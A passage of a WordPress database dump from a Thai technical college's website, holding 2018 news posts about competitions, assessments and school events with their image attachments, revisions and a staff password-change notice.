'%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%96-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2', '', '', '2018-12-03 13:26:33', '2018-12-03 06:26:33', '', 0, 'http://www.technicrayong.ac.th/?p=4711', 224, 'post', '', 0),
(4712, 3, '2018-12-03 13:25:09', '2018-12-03 06:25:09', '', '3-12-2561 13-27-50', '', 'inherit', 'closed', 'closed', '', '3-12-2561-13-27-50', '', '', '2018-12-03 13:25:09', '2018-12-03 06:25:09', '', 4711, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/3-12-2561-13-27-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(4713, 3, '2018-12-03 13:26:13', '2018-12-03 06:26:13', '', '46524261_714053405637517_1678333912012554240_o', '', 'inherit', 'closed', 'closed', '', '46524261_714053405637517_1678333912012554240_o', '', '', '2018-12-03 13:26:13', '2018-12-03 06:26:13', '', 4711, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46524261_714053405637517_1678333912012554240_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4714, 3, '2018-12-03 13:26:33', '2018-12-03 06:26:33', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.714050442304480&type=3\"><img class=\"aligncenter size-full wp-image-4712\" src=\"/wp-content/uploads/2018/12/3-12-2561-13-27-50.jpg\" alt=\"\" width=\"461\" height=\"619\" /></a>', 'วันจันทร์ที่ ๒๖ พฤศจิกายน ๒๕๖๑ วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย โดยมี นางณัฐธารีย์ สิรกุลปัญญาพร นายอานุภาพ วาสะสิริ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง ต้อนรับคณะกรรมตรวจประเมินฯ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4711-revision-v1', '', '', '2018-12-03 13:26:33', '2018-12-03 06:26:33', '', 4711, 'http://www.technicrayong.ac.th/4711-revision-v1/', 0, 'revision', '', 0),
(4715, 3, '2018-12-03 13:30:10', '2018-12-03 06:30:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D714530318923159%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๗ พฤศจิกายน ๒๕๖๑ นางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพงานเชื่อมโลหะ ระดับอาชีวศึกษาจังหวัดระยอง ณ แผนกช่างเชื่อมและเทคนิคโลหะ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%97-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2', '', '', '2018-12-03 13:30:10', '2018-12-03 06:30:10', '', 0, 'http://www.technicrayong.ac.th/?p=4715', 223, 'post', '', 0),
(4716, 3, '2018-12-03 13:28:33', '2018-12-03 06:28:33', '', '47052900_714528652256659_4488394279206518784_o (1)', '', 'inherit', 'closed', 'closed', '', '47052900_714528652256659_4488394279206518784_o-1', '', '', '2018-12-03 13:28:33', '2018-12-03 06:28:33', '', 4715, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47052900_714528652256659_4488394279206518784_o-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(4717, 3, '2018-12-03 13:30:10', '2018-12-03 06:30:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D714530318923159%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๗ พฤศจิกายน ๒๕๖๑ นางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพงานเชื่อมโลหะ ระดับอาชีวศึกษาจังหวัดระยอง ณ แผนกช่างเชื่อมและเทคนิคโลหะ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4715-revision-v1', '', '', '2018-12-03 13:30:10', '2018-12-03 06:30:10', '', 4715, 'http://www.technicrayong.ac.th/4715-revision-v1/', 0, 'revision', '', 0),
(4718, 3, '2018-12-03 13:59:21', '2018-12-03 06:59:21', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.715011122208412&type=3\"><img class=\"aligncenter wp-image-4719 size-full\" src=\"/wp-content/uploads/2018/12/3-12-2561-13-59-50.jpg\" alt=\"\" width=\"453\" height=\"615\" /></a>', 'ในวันอังคารที่ ๒๗ พฤศจิกายน ๒๕๖๑ เข้าร่วมการคัดเลือกและจัดแสดงผลงานธุรกิจของทีมธุรกิจดีเด่น ภายใต้โครงการส่งเสริมการประกอบอาชีพอิสระในกลุ่มผู้เรียนอาชีวศึกษา ณ วิทยาลัยอาชีวศึกษาธนบุรี กรุงเทพมหานคร ซึ่งทีมแผนธุรกิจ Chilli Cookies วิทยาลัยเทคนิคระยอง ผ่านการคัดเลือกจำนวน ๑๐ ทีม ได้รับรางวัลขวัญใจกรรมการ ประจำปีการศึกษา ๒๕๖๑ ไปแลกเปลี่ยนเรียนรู้ ณ ITE College Central Singapore', '', 'publish', 'closed', 'open', '', '%e0%b9%83%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%97-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81', '', '', '2018-12-03 13:59:21', '2018-12-03 06:59:21', '', 0, 'http://www.technicrayong.ac.th/?p=4718', 222, 'post', '', 0),
(4719, 3, '2018-12-03 13:57:40', '2018-12-03 06:57:40', '', '3-12-2561 13-59-50', '', 'inherit', 'closed', 'closed', '', '3-12-2561-13-59-50', '', '', '2018-12-03 13:57:40', '2018-12-03 06:57:40', '', 4718, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/3-12-2561-13-59-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(4720, 3, '2018-12-03 13:59:00', '2018-12-03 06:59:00', '', '46965697_715006235542234_8544488684047564800_o', '', 'inherit', 'closed', 'closed', '', '46965697_715006235542234_8544488684047564800_o', '', '', '2018-12-03 13:59:00', '2018-12-03 06:59:00', '', 4718, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46965697_715006235542234_8544488684047564800_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4721, 3, '2018-12-03 13:59:21', '2018-12-03 06:59:21', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.715011122208412&type=3\"><img class=\"aligncenter wp-image-4719 size-full\" src=\"/wp-content/uploads/2018/12/3-12-2561-13-59-50.jpg\" alt=\"\" width=\"453\" height=\"615\" /></a>', 'ในวันอังคารที่ ๒๗ พฤศจิกายน ๒๕๖๑ เข้าร่วมการคัดเลือกและจัดแสดงผลงานธุรกิจของทีมธุรกิจดีเด่น ภายใต้โครงการส่งเสริมการประกอบอาชีพอิสระในกลุ่มผู้เรียนอาชีวศึกษา ณ วิทยาลัยอาชีวศึกษาธนบุรี กรุงเทพมหานคร ซึ่งทีมแผนธุรกิจ Chilli Cookies วิทยาลัยเทคนิคระยอง ผ่านการคัดเลือกจำนวน ๑๐ ทีม ได้รับรางวัลขวัญใจกรรมการ ประจำปีการศึกษา ๒๕๖๑ ไปแลกเปลี่ยนเรียนรู้ ณ ITE College Central Singapore', '', 'inherit', 'closed', 'closed', '', '4718-revision-v1', '', '', '2018-12-03 13:59:21', '2018-12-03 06:59:21', '', 4718, 'http://www.technicrayong.ac.th/4718-revision-v1/', 0, 'revision', '', 0),
(4722, 3, '2018-12-03 14:03:04', '2018-12-03 07:03:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D715029595539898%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๒๘ พฤศจิกายน ๒๕๖๑ นางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการฝ่ายบริหารทรัพยากร วิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพงานกลึง กัด ตัด ไส ชิ้นงาน ระดับประกาศนียบัตรวิชาชีพ (ปวช.) ระดับอาชีวศึกษาจังหวัดระยอง ณ แผนกช่างกลโรงงานและเทคนิคการผลิต วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%98-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2%e0%b8%99-%e0%b9%92', '', '', '2018-12-03 14:03:04', '2018-12-03 07:03:04', '', 0, 'http://www.technicrayong.ac.th/?p=4722', 221, 'post', '', 0),
(4723, 3, '2018-12-03 14:02:35', '2018-12-03 07:02:35', '', '46863358_715021292207395_4518044663243866112_o', '', 'inherit', 'closed', 'closed', '', '46863358_715021292207395_4518044663243866112_o', '', '', '2018-12-03 14:02:35', '2018-12-03 07:02:35', '', 4722, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46863358_715021292207395_4518044663243866112_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4724, 3, '2018-12-03 14:03:04', '2018-12-03 07:03:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D715029595539898%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๒๘ พฤศจิกายน ๒๕๖๑ นางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการฝ่ายบริหารทรัพยากร วิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพงานกลึง กัด ตัด ไส ชิ้นงาน ระดับประกาศนียบัตรวิชาชีพ (ปวช.) ระดับอาชีวศึกษาจังหวัดระยอง ณ แผนกช่างกลโรงงานและเทคนิคการผลิต วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4722-revision-v1', '', '', '2018-12-03 14:03:04', '2018-12-03 07:03:04', '', 4722, 'http://www.technicrayong.ac.th/4722-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4726, 3, '2018-12-04 11:45:05', '2018-12-04 04:45:05', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.715680882141436&type=3\"><img class=\"aligncenter size-full wp-image-4727\" src=\"/wp-content/uploads/2018/12/4-12-2561-9-33-20.jpg\" alt=\"\" width=\"456\" height=\"663\" /></a>', 'วันพฤหัสบดีที่ ๒๙ พฤศจิกายน ๒๕๖๑ จัดพิธีเปิดงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพและทักษะพื้นฐาน ระดับอาชีวศึกษาจังหวัดระยอง โดยได้รับเกียรติจากท่านธวัชชัย อุ่ยพานิช รองศึกษาธิการภาค ๙ เป็นประธานในพิธีเปิดแบบสากล และ ท่านว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานถึงวัตถุประสงค์ในการจัดงานในครั้งนี้ ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%99-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81', '', '', '2018-12-04 11:45:05', '2018-12-04 04:45:05', '', 0, 'http://www.technicrayong.ac.th/?p=4726', 220, 'post', '', 0),
(4727, 3, '2018-12-04 09:31:28', '2018-12-04 02:31:28', '', '4-12-2561 9-33-20', '', 'inherit', 'closed', 'closed', '', '4-12-2561-9-33-20', '', '', '2018-12-04 09:31:28', '2018-12-04 02:31:28', '', 4726, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/4-12-2561-9-33-20.jpg', 0, 'attachment', 'image/jpeg', 0),
(4728, 3, '2018-12-04 09:33:55', '2018-12-04 02:33:55', '', '47105650_715685885474269_3262351171133636608_o', '', 'inherit', 'closed', 'closed', '', '47105650_715685885474269_3262351171133636608_o', '', '', '2018-12-04 09:33:55', '2018-12-04 02:33:55', '', 4726, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47105650_715685885474269_3262351171133636608_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4729, 3, '2018-12-04 11:45:05', '2018-12-04 04:45:05', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.715680882141436&type=3\"><img class=\"aligncenter size-full wp-image-4727\" src=\"/wp-content/uploads/2018/12/4-12-2561-9-33-20.jpg\" alt=\"\" width=\"456\" height=\"663\" /></a>', 'วันพฤหัสบดีที่ ๒๙ พฤศจิกายน ๒๕๖๑ จัดพิธีเปิดงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพและทักษะพื้นฐาน ระดับอาชีวศึกษาจังหวัดระยอง โดยได้รับเกียรติจากท่านธวัชชัย อุ่ยพานิช รองศึกษาธิการภาค ๙ เป็นประธานในพิธีเปิดแบบสากล และ ท่านว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานถึงวัตถุประสงค์ในการจัดงานในครั้งนี้ ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4726-revision-v1', '', '', '2018-12-04 11:45:05', '2018-12-04 04:45:05', '', 4726, 'http://www.technicrayong.ac.th/4726-revision-v1/', 0, 'revision', '', 0),
(4730, 3, '2018-12-06 10:50:16', '2018-12-06 03:50:16', '<h3><span style=\"color: #0000ff;\">หมายเหตุ : </span><span style=\"color: #ff0000;\">บัญชีผู้ใช้งานที่ได้รับจากงานศูนย์ข้อมูลฯ นั้น ผู้ใช้สามารถเปลี่ยนแปลงได้ในส่วนของรหัสผ่าน เพียงอย่างเดียวเท่านั้น โดยทำตามขั้นตอนด้านล่าง ดังนี้</span></h3>\r\n<h2><span style=\"color: #0000ff;\"><strong>คลิ๊ก>> <a href=\"https://192.168.254.8:21212/\"><span style=\"color: #ff0000;\">https://192.168.254.8:21212/</span></a></strong></span><span style=\"color: #ff0000;\"> </span><span style=\"color: #0000ff;\">เพื่อเปลี่ยน Password</span></h2>\r\n<img class=\"aligncenter wp-image-2953 size-full\" src=\"/wp-content/uploads/2018/06/1.jpg\" alt=\"\" width=\"870\" height=\"501\" />\r\n\r\n<img class=\"aligncenter wp-image-2952 size-full\" src=\"/wp-content/uploads/2018/06/2.jpg\" alt=\"\" width=\"1187\" height=\"677\" /><img class=\"aligncenter wp-image-2951 size-full\" src=\"/wp-content/uploads/2018/06/3.jpg\" alt=\"\" width=\"1022\" height=\"688\" /><img class=\"aligncenter wp-image-2950 size-full\" src=\"/wp-content/uploads/2018/06/4.jpg\" alt=\"\" width=\"1135\" height=\"677\" />', 'ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต', '', 'inherit', 'closed', 'closed', '', '2947-revision-v1', '', '', '2018-12-06 10:50:16', '2018-12-06 03:50:16', '', 2947, 'http://www.technicrayong.ac.th/2947-revision-v1/', 0, 'revision', '', 0),
(4731, 3, '2018-12-06 10:50:36', '2018-12-06 03:50:36', '<h3><span style=\"color: #0000ff;\">หมายเหตุ : </span><span style=\"color: #ff0000;\">บัญชีผู้ใช้งานที่ได้รับจากงานศูนย์ข้อมูลฯ นั้น ผู้ใช้สามารถเปลี่ยนแปลงได้ในส่วนของรหัสผ่าน เพียงอย่างเดียวเท่านั้น โดยทำตามขั้นตอนด้านล่าง ดังนี้</span></h3>\r\n<h2><span style=\"color: #0000ff;\"><strong>คลิ๊ก>> <a href=\"https://192.168.254.8:21212/\"><span style=\"color: #ff0000;\">https://192.168.254.8:21212/</span></a></strong></span><span style=\"color: #ff0000;\"> </span><span style=\"color: #0000ff;\">เพื่อเปลี่ยน Password</span></h2>\r\n<img class=\"aligncenter wp-image-2953 size-full\" src=\"/wp-content/uploads/2018/06/1.jpg\" alt=\"\" width=\"870\" height=\"501\" />\r\n\r\n<img class=\"aligncenter wp-image-2952 size-full\" src=\"/wp-content/uploads/2018/06/2.jpg\" alt=\"\" width=\"1187\" height=\"677\" /><img class=\"aligncenter wp-image-2951 size-full\" src=\"/wp-content/uploads/2018/06/3.jpg\" alt=\"\" width=\"1022\" height=\"688\" /><img class=\"aligncenter wp-image-2950 size-full\" src=\"/wp-content/uploads/2018/06/4.jpg\" alt=\"\" width=\"1135\" height=\"677\" />', 'ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต', '', 'inherit', 'closed', 'closed', '', '2947-autosave-v1', '', '', '2018-12-06 10:50:36', '2018-12-06 03:50:36', '', 2947, 'http://www.technicrayong.ac.th/2947-autosave-v1/', 0, 'revision', '', 0),
(4732, 3, '2018-12-06 13:32:13', '2018-12-06 06:32:13', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.716301405412717%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๓๐ พฤศจิกายน ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานมอบเกียรติบัตรให้แก่นักเรียน นักศึกษา ในงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน และหลักสูตรระยะสั้น อาชีวศึกษาจังหวัดระยอง ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%93%e0%b9%90-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2%e0%b8%99', '', '', '2018-12-06 13:32:13', '2018-12-06 06:32:13', '', 0, 'http://www.technicrayong.ac.th/?p=4732', 219, 'post', '', 0),
(4733, 3, '2018-12-06 13:31:29', '2018-12-06 06:31:29', '', '47071619_716303325412525_4575238724090068992_o', '', 'inherit', 'closed', 'closed', '', '47071619_716303325412525_4575238724090068992_o', '', '', '2018-12-06 13:31:29', '2018-12-06 06:31:29', '', 4732, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47071619_716303325412525_4575238724090068992_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4734, 3, '2018-12-06 13:32:13', '2018-12-06 06:32:13', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.716301405412717%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๓๐ พฤศจิกายน ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานมอบเกียรติบัตรให้แก่นักเรียน นักศึกษา ในงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน และหลักสูตรระยะสั้น อาชีวศึกษาจังหวัดระยอง ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4732-revision-v1', '', '', '2018-12-06 13:32:13', '2018-12-06 06:32:13', '', 4732, 'http://www.technicrayong.ac.th/4732-revision-v1/', 0, 'revision', '', 0),
(4735, 3, '2018-12-06 13:41:32', '2018-12-06 06:41:32', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.717860961923428&type=3\"><img class=\"aligncenter size-full wp-image-4736\" src=\"/wp-content/uploads/2018/12/6-12-2561-13-41-24.jpg\" alt=\"\" width=\"404\" height=\"591\" /></a>', 'วันเสาร์ที่ ๑ ธันวาคม ๒๕๖๑ จัดการประชุมผู้ปกครองนักเรียน ระดับชั้น ปวช.ทั้งหมด และระดับ ปวส.ทั้งหมด ในวันอาทิตย์ที่ ๒ ธันวาคม ๒๕๖๑ ภายใต้โครงการประชุมเครือข่ายผู้ปกครอง เพื่อลดปัญหาการออกกลางคันของผู้เรียน ประจำภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑ โดยมีท่าน ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด พร้อมด้วยคณะผู้บริหารให้ข้อมูลเกี่ยวกับการศึกษา รวมไปถึงบริษัท Student care (ระบบดูแลผู้เรียน) มาให้ข้อมูลอธิบายการใช้งานและติดตั้งระบบมือถือเพื่อรับแจ้งข่าวสารจากทางวิทยาลัยฯ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95', '', '', '2018-12-06 13:41:32', '2018-12-06 06:41:32', '', 0, 'http://www.technicrayong.ac.th/?p=4735', 218, 'post', '', 0),
(4736, 3, '2018-12-06 13:38:38', '2018-12-06 06:38:38', '', '6-12-2561 13-41-24', '', 'inherit', 'closed', 'closed', '', '6-12-2561-13-41-24', '', '', '2018-12-06 13:38:38', '2018-12-06 06:38:38', '', 4735, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/6-12-2561-13-41-24.jpg', 0, 'attachment', 'image/jpeg', 0),
(4737, 3, '2018-12-06 13:41:06', '2018-12-06 06:41:06', '', '47369608_717871381922386_5118731105565933568_o', '', 'inherit', 'closed', 'closed', '', '47369608_717871381922386_5118731105565933568_o', '', '', '2018-12-06 13:41:06', '2018-12-06 06:41:06', '', 4735, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47369608_717871381922386_5118731105565933568_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4738, 3, '2018-12-06 13:41:32', '2018-12-06 06:41:32', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.717860961923428&type=3\"><img class=\"aligncenter size-full wp-image-4736\" src=\"/wp-content/uploads/2018/12/6-12-2561-13-41-24.jpg\" alt=\"\" width=\"404\" height=\"591\" /></a>', 'วันเสาร์ที่ ๑ ธันวาคม ๒๕๖๑ จัดการประชุมผู้ปกครองนักเรียน ระดับชั้น ปวช.ทั้งหมด และระดับ ปวส.ทั้งหมด ในวันอาทิตย์ที่ ๒ ธันวาคม ๒๕๖๑ ภายใต้โครงการประชุมเครือข่ายผู้ปกครอง เพื่อลดปัญหาการออกกลางคันของผู้เรียน ประจำภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑ โดยมีท่าน ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด พร้อมด้วยคณะผู้บริหารให้ข้อมูลเกี่ยวกับการศึกษา รวมไปถึงบริษัท Student care (ระบบดูแลผู้เรียน) มาให้ข้อมูลอธิบายการใช้งานและติดตั้งระบบมือถือเพื่อรับแจ้งข่าวสารจากทางวิทยาลัยฯ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4735-revision-v1', '', '', '2018-12-06 13:41:32', '2018-12-06 06:41:32', '', 4735, 'http://www.technicrayong.ac.th/4735-revision-v1/', 0, 'revision', '', 0),
(4739, 3, '2018-12-06 13:48:27', '2018-12-06 06:48:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fnon.nut.not%2Fposts%2F2203123843044986&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ในวันที่ ๒๔–๒๕ พฤศจิกายน และ ๑–๒ ธันวาคม ๒๕๖๑ ชมรมวิชาชีพช่างไฟฟ้ากำลัง ร่วมกับบริษัท โกลบอล เพาเวอร์ ซินเนอร์ยี่ จำกัด (มหาชน) หรือ GPSC ได้ดำเนินโครงการ Light for better Life โดยมีวัตถุประสงค์เพื่อดำเนินกิจกรรมหมอไฟฟ้า ทำการปรับปรุง ซ่อมแซมระบบไฟฟ้าเพื่อลดความเสี่ยงในการเกิดเพลิงไหม้ให้กับโรงเรียนวัดน้ำคอก อำเภอเมืองระยอง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%83%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%94-%e0%b9%92%e0%b9%95-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2%e0%b8%99', '', '', '2018-12-06 13:48:27', '2018-12-06 06:48:27', '', 0, 'http://www.technicrayong.ac.th/?p=4739', 217, 'post', '', 0),
(4740, 3, '2018-12-06 13:47:41', '2018-12-06 06:47:41', '', '47375770_2203069439717093_3287369484481855488_o', '', 'inherit', 'closed', 'closed', '', '47375770_2203069439717093_3287369484481855488_o', '', '', '2018-12-06 13:47:41', '2018-12-06 06:47:41', '', 4739, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47375770_2203069439717093_3287369484481855488_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4741, 3, '2018-12-06 13:48:27', '2018-12-06 06:48:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fnon.nut.not%2Fposts%2F2203123843044986&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ในวันที่ ๒๔–๒๕ พฤศจิกายน และ ๑–๒ ธันวาคม ๒๕๖๑ ชมรมวิชาชีพช่างไฟฟ้ากำลัง ร่วมกับบริษัท โกลบอล เพาเวอร์ ซินเนอร์ยี่ จำกัด (มหาชน) หรือ GPSC ได้ดำเนินโครงการ Light for better Life โดยมีวัตถุประสงค์เพื่อดำเนินกิจกรรมหมอไฟฟ้า ทำการปรับปรุง ซ่อมแซมระบบไฟฟ้าเพื่อลดความเสี่ยงในการเกิดเพลิงไหม้ให้กับโรงเรียนวัดน้ำคอก อำเภอเมืองระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4739-revision-v1', '', 